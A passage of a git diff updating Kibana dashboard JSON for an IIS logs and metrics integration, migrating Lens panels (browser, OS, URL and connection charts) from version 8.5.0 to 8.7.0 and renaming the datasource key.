"indexpattern-datasource-layer-fd149e1e-318c-4e85-b6d6-aea79fa8f331", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "fd149e1e-318c-4e85-b6d6-aea79fa8f331": { - "columnOrder": [ - "55d696f1-af3d-4337-9079-5f508bb7067b", - "bb351508-abfd-4fba-93dc-a368503122c5", - "482cc37a-80e9-4259-92dc-da53d07c23f2" - ], - "columns": { - "482cc37a-80e9-4259-92dc-da53d07c23f2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "55d696f1-af3d-4337-9079-5f508bb7067b": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.name: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.name" - }, - "bb351508-abfd-4fba-93dc-a368503122c5": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.version: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.version" - } - }, - 
"incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Error logs over time" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "ff2a5b50-3711-4db3-b189-0581ddba15f6", + "w": 24, + "x": 0, + "y": 42 + }, + "panelIndex": "ff2a5b50-3711-4db3-b189-0581ddba15f6", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fd149e1e-318c-4e85-b6d6-aea79fa8f331", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "fd149e1e-318c-4e85-b6d6-aea79fa8f331": { + "columnOrder": [ + "55d696f1-af3d-4337-9079-5f508bb7067b", + "bb351508-abfd-4fba-93dc-a368503122c5", + "482cc37a-80e9-4259-92dc-da53d07c23f2" + ], + "columns": { + "482cc37a-80e9-4259-92dc-da53d07c23f2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "55d696f1-af3d-4337-9079-5f508bb7067b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.name: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "layers": [ - { - "categoryDisplay": "hide", - "layerId": "fd149e1e-318c-4e85-b6d6-aea79fa8f331", - "layerType": "data", - "legendDisplay": "show", - "metric": "482cc37a-80e9-4259-92dc-da53d07c23f2", - "nestedLegend": 
false, - "numberDisplay": "percent", - "primaryGroups": [ - "55d696f1-af3d-4337-9079-5f508bb7067b", - "bb351508-abfd-4fba-93dc-a368503122c5" - ] - } - ], - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "shape": "donut" - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "ff2a5b50-3711-4db3-b189-0581ddba15f6", - "w": 24, - "x": 0, - "y": 42 + "bb351508-abfd-4fba-93dc-a368503122c5": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.version: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.version" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "hide", + "layerId": "fd149e1e-318c-4e85-b6d6-aea79fa8f331", + "layerType": "data", + "legendDisplay": "show", + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "55d696f1-af3d-4337-9079-5f508bb7067b", + "bb351508-abfd-4fba-93dc-a368503122c5" + ], + "metrics": [ + "482cc37a-80e9-4259-92dc-da53d07c23f2" + ] + } + ], + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "panelIndex": "ff2a5b50-3711-4db3-b189-0581ddba15f6", - "title": "Browsers 
breakdown", - "type": "lens", - "version": "8.5.0" + "shape": "donut" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-83c02141-7b27-4ae9-8c80-d251c18f5685", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "83c02141-7b27-4ae9-8c80-d251c18f5685": { - "columnOrder": [ - "0f4b2ec0-bf3f-44cf-b888-370cda0c46e6", - "ff18c09c-1df1-41e9-9f42-d846a26dac01", - "42cb9808-f556-4da5-a3d5-07e3d28a48dc" - ], - "columns": { - "0f4b2ec0-bf3f-44cf-b888-370cda0c46e6": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.os.name: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.os.name" - }, - "42cb9808-f556-4da5-a3d5-07e3d28a48dc": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "ff18c09c-1df1-41e9-9f42-d846a26dac01": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.os.version: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - 
"orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.os.version" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Browsers breakdown" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "9af5aff6-6430-485d-b606-faf9a2199a1e", + "w": 24, + "x": 24, + "y": 42 + }, + "panelIndex": "9af5aff6-6430-485d-b606-faf9a2199a1e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-83c02141-7b27-4ae9-8c80-d251c18f5685", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "83c02141-7b27-4ae9-8c80-d251c18f5685": { + "columnOrder": [ + "0f4b2ec0-bf3f-44cf-b888-370cda0c46e6", + "ff18c09c-1df1-41e9-9f42-d846a26dac01", + "42cb9808-f556-4da5-a3d5-07e3d28a48dc" + ], + "columns": { + "0f4b2ec0-bf3f-44cf-b888-370cda0c46e6": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.os.name: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "layers": [ - { - "categoryDisplay": "hide", - "layerId": "83c02141-7b27-4ae9-8c80-d251c18f5685", - "layerType": "data", - "legendDisplay": "show", - "metric": "42cb9808-f556-4da5-a3d5-07e3d28a48dc", - 
"nestedLegend": false, - "numberDisplay": "percent", - "primaryGroups": [ - "0f4b2ec0-bf3f-44cf-b888-370cda0c46e6", - "ff18c09c-1df1-41e9-9f42-d846a26dac01" - ] - } - ], - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "shape": "donut" - } + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.os.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "9af5aff6-6430-485d-b606-faf9a2199a1e", - "w": 24, - "x": 24, - "y": 42 + "42cb9808-f556-4da5-a3d5-07e3d28a48dc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "ff18c09c-1df1-41e9-9f42-d846a26dac01": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.os.version: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.os.version" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "hide", + "layerId": "83c02141-7b27-4ae9-8c80-d251c18f5685", + "layerType": "data", + "legendDisplay": "show", + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "0f4b2ec0-bf3f-44cf-b888-370cda0c46e6", + "ff18c09c-1df1-41e9-9f42-d846a26dac01" + ], + "metrics": [ + 
"42cb9808-f556-4da5-a3d5-07e3d28a48dc" + ] + } + ], + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "panelIndex": "9af5aff6-6430-485d-b606-faf9a2199a1e", - "title": "Operating systems breakdown", - "type": "lens", - "version": "8.5.0" + "shape": "donut" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-47ae5d42-07e3-4ac9-9ff8-9cec51f84c91", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "47ae5d42-07e3-4ac9-9ff8-9cec51f84c91": { - "columnOrder": [ - "89e93e71-74ba-4eeb-8388-e39e4009e3cf", - "75e08c2e-83f6-4f8b-999f-1aa7d1f44c17", - "49e2e550-a0cd-4e2f-9107-263de26bc41c" - ], - "columns": { - "49e2e550-a0cd-4e2f-9107-263de26bc41c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "http.response.status_code: *" - }, - "isBucketed": false, - "label": "Count", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "75e08c2e-83f6-4f8b-999f-1aa7d1f44c17": { - "dataType": "number", - "isBucketed": true, - "label": "Top 5 values of http.response.status_code", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "49e2e550-a0cd-4e2f-9107-263de26bc41c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "http.response.status_code" - }, - "89e93e71-74ba-4eeb-8388-e39e4009e3cf": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "URLs", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "49e2e550-a0cd-4e2f-9107-263de26bc41c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" 
- }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "url.path" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Operating systems breakdown" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "763a513d-7bdc-489f-8088-9ae32d65b5ca", + "w": 48, + "x": 0, + "y": 27 + }, + "panelIndex": "763a513d-7bdc-489f-8088-9ae32d65b5ca", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-47ae5d42-07e3-4ac9-9ff8-9cec51f84c91", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "47ae5d42-07e3-4ac9-9ff8-9cec51f84c91": { + "columnOrder": [ + "89e93e71-74ba-4eeb-8388-e39e4009e3cf", + "75e08c2e-83f6-4f8b-999f-1aa7d1f44c17", + "49e2e550-a0cd-4e2f-9107-263de26bc41c" + ], + "columns": { + "49e2e550-a0cd-4e2f-9107-263de26bc41c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "http.response.status_code: *" + }, + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "75e08c2e-83f6-4f8b-999f-1aa7d1f44c17": { + "dataType": "number", + "isBucketed": true, + "label": "Top 5 values of http.response.status_code", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "49e2e550-a0cd-4e2f-9107-263de26bc41c", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - 
"49e2e550-a0cd-4e2f-9107-263de26bc41c" - ], - "layerId": "47ae5d42-07e3-4ac9-9ff8-9cec51f84c91", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal_stacked", - "showGridlines": false, - "splitAccessor": "75e08c2e-83f6-4f8b-999f-1aa7d1f44c17", - "xAccessor": "89e93e71-74ba-4eeb-8388-e39e4009e3cf", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "49e2e550-a0cd-4e2f-9107-263de26bc41c" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "bar_horizontal_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "URLs" - } + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.response.status_code" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "89e93e71-74ba-4eeb-8388-e39e4009e3cf": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "URLs", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "49e2e550-a0cd-4e2f-9107-263de26bc41c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "url.path" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 15, - "i": "763a513d-7bdc-489f-8088-9ae32d65b5ca", - "w": 48, - "x": 0, - "y": 27 + "layers": [ + { + "accessors": [ + "49e2e550-a0cd-4e2f-9107-263de26bc41c" + ], + "layerId": "47ae5d42-07e3-4ac9-9ff8-9cec51f84c91", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "splitAccessor": "75e08c2e-83f6-4f8b-999f-1aa7d1f44c17", + "xAccessor": 
"89e93e71-74ba-4eeb-8388-e39e4009e3cf", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "49e2e550-a0cd-4e2f-9107-263de26bc41c" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "panelIndex": "763a513d-7bdc-489f-8088-9ae32d65b5ca", - "title": "Top URLs by response code", - "type": "lens", - "version": "8.5.0" - } - ], - "timeRestore": false, - "title": "[Logs IIS] Access and error logs", - "version": 1 - }, - "coreMigrationVersion": "8.5.0", - "id": "iis-4278ad30-fe16-11e7-a3b0-d13028918f9f", - "migrationVersion": { - "dashboard": "8.5.0" - }, - "references": [ - { - "id": "iis-0ac17980-e1d8-11ec-baf0-970634a1784d", - "name": "ec72819b-6985-4761-94ae-5d5fcc9e682a:panel_ec72819b-6985-4761-94ae-5d5fcc9e682a", - "type": "map" - }, - { - "id": "logs-*", - "name": "88dc28a3-1ff6-448c-aa64-06f954ea2e8f:indexpattern-datasource-layer-238d8224-43e0-4df5-9862-decc0b59c88e", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "1823acfd-eadf-42be-b208-773047e26dec:indexpattern-datasource-layer-ddb9c755-6e2e-4aa2-a0ad-47f5a3802700", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "ff2a5b50-3711-4db3-b189-0581ddba15f6:indexpattern-datasource-layer-fd149e1e-318c-4e85-b6d6-aea79fa8f331", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "9af5aff6-6430-485d-b606-faf9a2199a1e:indexpattern-datasource-layer-83c02141-7b27-4ae9-8c80-d251c18f5685", - "type": "index-pattern" + "preferredSeriesType": "bar_horizontal_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "URLs" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "logs-*", - "name": "763a513d-7bdc-489f-8088-9ae32d65b5ca:indexpattern-datasource-layer-47ae5d42-07e3-4ac9-9ff8-9cec51f84c91", - "type": "index-pattern" - } + "title": "Top URLs by response code" + } ], - "type": "dashboard" + 
"timeRestore": false, + "title": "[Logs IIS] Access and error logs", + "version": 1 + }, + "references": [ + { + "id": "logs-*", + "name": "88dc28a3-1ff6-448c-aa64-06f954ea2e8f:indexpattern-datasource-layer-238d8224-43e0-4df5-9862-decc0b59c88e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1823acfd-eadf-42be-b208-773047e26dec:indexpattern-datasource-layer-ddb9c755-6e2e-4aa2-a0ad-47f5a3802700", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ff2a5b50-3711-4db3-b189-0581ddba15f6:indexpattern-datasource-layer-fd149e1e-318c-4e85-b6d6-aea79fa8f331", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9af5aff6-6430-485d-b606-faf9a2199a1e:indexpattern-datasource-layer-83c02141-7b27-4ae9-8c80-d251c18f5685", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "763a513d-7bdc-489f-8088-9ae32d65b5ca:indexpattern-datasource-layer-47ae5d42-07e3-4ac9-9ff8-9cec51f84c91", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "ec72819b-6985-4761-94ae-5d5fcc9e682a:layer_1_source_index_pattern", + "id": "logs-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/iis/kibana/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7.json b/packages/iis/kibana/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7.json index cd6743bb98c..47f145c5a44 100644 --- a/packages/iis/kibana/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7.json +++ b/packages/iis/kibana/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7.json 
@@ -1,2639 +1,2662 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"1a1fa4d4-877e-44cb-ae33-ed1cdb800e99\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"iis.website.name\",\"title\":\"Website\",\"id\":\"1a1fa4d4-877e-44cb-ae33-ed1cdb800e99\",\"enhancements\":{}}}}" + "id": "iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:17:42.355Z", + "created_at": "2023-11-07T17:17:42.355Z", + "version": "WzEwNiwxXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "oneLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"1a1fa4d4-877e-44cb-ae33-ed1cdb800e99\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"iis.website.name\",\"title\":\"Website\",\"id\":\"1a1fa4d4-877e-44cb-ae33-ed1cdb800e99\",\"enhancements\":{}}}}" + }, + "description": "This dashboard shows metrics for the websites running on IIS.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.7.0", + "type": "visualization", + "gridData": { + "h": 12, + "i": "7dffa44e-5ac7-46a6-9301-6952beedbee5", + "w": 9, + "x": 0, + "y": 0 }, - "description": "This dashboard shows metrics for the websites running on IIS.", - 
"hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "7dffa44e-5ac7-46a6-9301-6952beedbee5", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "### IIS\n\n[Webserver](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [Webserver processes](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [**Websites**](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [Application Pools](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) \n\n\n\n", + "openLinksInNewTab": false + }, + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true + "title": "Navigation Website Overview" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "d366a32e-1ed5-4089-82b4-e9e34b674c43", + "w": 13, + "x": 9, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "### IIS\n\n[Webserver](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [Webserver processes](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [**Websites**](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [Application Pools](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) \n\n\n\n", - "openLinksInNewTab": false + "panelIndex": "d366a32e-1ed5-4089-82b4-e9e34b674c43", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": 
{}, + "datasourceStates": { + "formBased": { + "layers": { + "ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d": { + "columnOrder": [ + "7be25a00-f479-4413-ab6a-817744e0e070", + "8a0acddd-9a1d-4d55-ac1a-0687cb155d02" + ], + "columns": { + "7be25a00-f479-4413-ab6a-817744e0e070": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" }, - "type": "markdown", - "uiState": {} + "8a0acddd-9a1d-4d55-ac1a-0687cb155d02": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Current Connections", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.website.network.current_connections" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "fillOpacity": 1.2, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "8a0acddd-9a1d-4d55-ac1a-0687cb155d02" + ], + "layerId": "ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" 
+ }, + "seriesType": "bar_horizontal", + "xAccessor": "7be25a00-f479-4413-ab6a-817744e0e070", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(104,188,0,1)", + "forAccessor": "8a0acddd-9a1d-4d55-ac1a-0687cb155d02" + } + ] + } + ], + "legend": { + "isVisible": false, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false }, - "gridData": { - "h": 12, - "i": "7dffa44e-5ac7-46a6-9301-6952beedbee5", - "w": 9, - "x": 0, - "y": 0 - }, - "panelIndex": "7dffa44e-5ac7-46a6-9301-6952beedbee5", - "title": "Navigation Website Overview", - "type": "visualization", - "version": "8.5.0" + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": false + }, + "valueLabels": "show" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d": { - "columnOrder": [ - "7be25a00-f479-4413-ab6a-817744e0e070", - "8a0acddd-9a1d-4d55-ac1a-0687cb155d02" - ], - "columns": { - "7be25a00-f479-4413-ab6a-817744e0e070": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "8a0acddd-9a1d-4d55-ac1a-0687cb155d02": { - "customLabel": true, - "dataType": 
